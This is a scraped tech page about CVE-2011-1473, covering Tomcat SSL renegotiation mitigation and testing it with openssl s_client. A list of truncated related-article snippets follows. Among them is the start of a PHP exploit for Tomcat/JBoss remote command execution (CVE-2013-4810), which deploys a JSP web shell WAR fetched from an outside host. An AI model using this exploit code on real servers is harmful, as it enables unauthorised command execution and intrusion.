CVE-2011-1473 tomcat

Per the bottom of: http://tomcat.apache.org/security-7.html#Not_a_vulnerability_in_Tomcat  tweak your server.xml to use Java‘s own NIO conector (SSL implementation):

"The NIO connector is not vulnerable as it does not support renegotiation."

e.g.

<Connector protocol="org.apache.coyote.http11.Http11NioProtocol"

Note: May impact performance / expose new issues.
          PCI-DSS requires you to apply vendor patches, if there isn‘t a vendor patch your not expected to come upwith your own
          If you have an Application level firewall sitting in front of your Tomcat, to get another PCI-DSS tick e.g. F5 BigIP it could block any renegotiation requests.

https://www.experts-exchange.com/questions/27859898/Disabling-SSL-TLS-Renegotiation-in-Tomcat.html

Testing for SSL renegotiation

December 15, 2009

Edit: Please note that the test described here works only with OpenSSL version that was not patched to deal with insecure renegotiation. I recommend that you download version 0.9.8k directly from the OpenSSL web site and compile a special binary to use for testing.



Someone asked me how to test for SSL connection renegotiation, so I thought I would also write here for the benefit of everyone. Testing is easy provided you have access to an un-patched version of OpenSSL. To test, you will use the s_client tool (you‘ll type the bits in blue):

$ openssl s_client -connect www.ssllabs.com:443[snip... a lot of openssl output]---HEAD / HTTP/1.0RRENEGOTIATING28874:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:530:

The idea is that you connect to an SSL server and start by typing the first line of a request. You then type a single uppercase letter R on a single line, which tells OpenSSL to ask for renegotiation. I am aware of the following outcomes:

  • Your HTTP request completes, which means that renegotiation is enabled
  • You get an error (one such possible error is shown in the example above), which means that renegotiation did not work
  • The connection blocks and timeouts after a while, which is how OpenSSL 0.9.8l deals with renegotiation.

Of course, a SSL Labs report will tell you whether a particular server supports renegotiation.

https://blog.ivanristic.com/2009/12/testing-for-ssl-renegotiation.html

http://orchilles.com/ssl-renegotiation-dos/

时间: 2024-10-17 11:51:30

CVE-2011-1473 tomcat的相关文章

[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行

1 <?php 2 3 $host=gethostbyname($argv[1]); 4 $port=$argv[2]; 5 $cmd=$argv[3]; 6 7 8 //small jsp shell 9 //change this if you want, url to the app to be deployed, keep it short 10 $url="http://retrogod.altervista.org/a.war?"; 11 12 13 $url_len

nginx+tomcat+memcache

nginx支持静态页面tomcat支持动态页面如果所在的nginx服务器想要进行动态页面则需与tomcat结合此时nginx只是起到转发的作用对jsp的处理是由tomcat来处理的. 一 搭建jdk 先搭建java环境 1  tar zxf jdk-7u79-linux-x64.tar.gz -C /usr/local/    ###解压到/usr/local下### 2 ln -s jdk1.7.0_79/ java            ###软链接方便版本升级后的使用### 3 vim /

Tomcat+Nginx+Memcacheed集群部署

主机环境 redhat6.5 64位 实验环境 服务端1 ip172.25.29.1   nginx 服务端2 ip 172.25.29.2    tomcat+memcached 服务端3 ip 172.25.29.3    tomcat+memcaceed 安装包  jdk-7u79-linux-x64.tar.gz apache-tomcat-7.0.37.tar.gz nginx-goodies-nginx-sticky-module-ng-c78b7dd79d0d.tar.gz asm

Tomcat在CentOS6.7上的安装配置及使用

软件: 操作系统:CentOS-2.6.32-573.el6.x86_64 Tomcat:apache-tomcat-8.5.4.tar.gz JDK:jdk-7u67-linux-x64.rpm 软件安装 二:JDK软件安装及配置 1.安装JDK [[email protected] ~]# rpm -ivh jdk-7u67-linux-x64\(1\).rpm Preparing...                #####################################

配置tomcat 7控制台账号

修改/usr/local/tomcat/conf/tomcat-users.xml 文件如下 <?xml version='1.0' encoding='utf-8'?>       <tomcat-users>          <role rolename="tomcat"/>          <role rolename="role1"/>          <role rolename="ma

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS

catalog 1. Description 2. Analysis 3. POC 4. Solution 1. Description MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infini

使用eclipse+tomcat搭建本地环境

项目开发工具很多,这里简单介绍下使用eclipse+tomcat如何搭建本地环境. 安装开发工具如下: 1. jdk的安装参考 下载地址:http://pan.baidu.com/s/1sj9rVYX 安装参考地址:http://www.cnblogs.com/pxue/archive/2011/05/10/2042530.html 如果cmd中javac运行不了,尝试将环境变量中的path的%JAVA_HOME%路径设置为绝对路径 关键点:(设置三个环境变量) JAVA_HOME      

Mac下如何安装Tomcat

原文地址:http://www.zhengjie.info/2011/12/20/2091 1. 下载Tomcat(地址:tomcat.apache.org),选择适合的版本(这里选择6.0.35),点击“Download”,之后在新页面点击“Core下的”“tar.gz”(6.2Mb) 2. 解压Tomcat到目录:/Library 中,并把文件夹名由“apache-tomcat-6.0.16”改为“Tomcat” 3. 打开 “应用程序(Application)”——“终端(Terminal

Socket、Servlet、Tomcat

一.Socket Socket是网络编程接口(API),使得开发者可以方便地使用TCP\IP协议进行数据的传输,其客户端与服务端的交互流程为: 二.Http协议 Web应用程序主要使用HTTP协议,但HTTP协议本身存在两个问题:无状态和内容的文本表示.对于前者来说,没有记录多个请求之间的关系,而对后者来讲,如果使用Java来编程,需要进行文本和Java类型的转换. 三.Servlet Java针对Web提出了Servlet规范,即提供了Java与HTTP协议沟通的接口,这意味着Java可以以直

linux-jdk安装,tomcat安装

一.下载jdk 官方下载地址:http://www.oracle.com/technetwork/java/javase/downloads/index.html 二.linux安装jdk [[email protected] ~]# lsanaconda-ks.cfg              Desktop    icbc_auto_platform  jdk-8u131-linux-x64.rpm  mysql-5.6.13-linux-glibc2.5-x86_64         Pu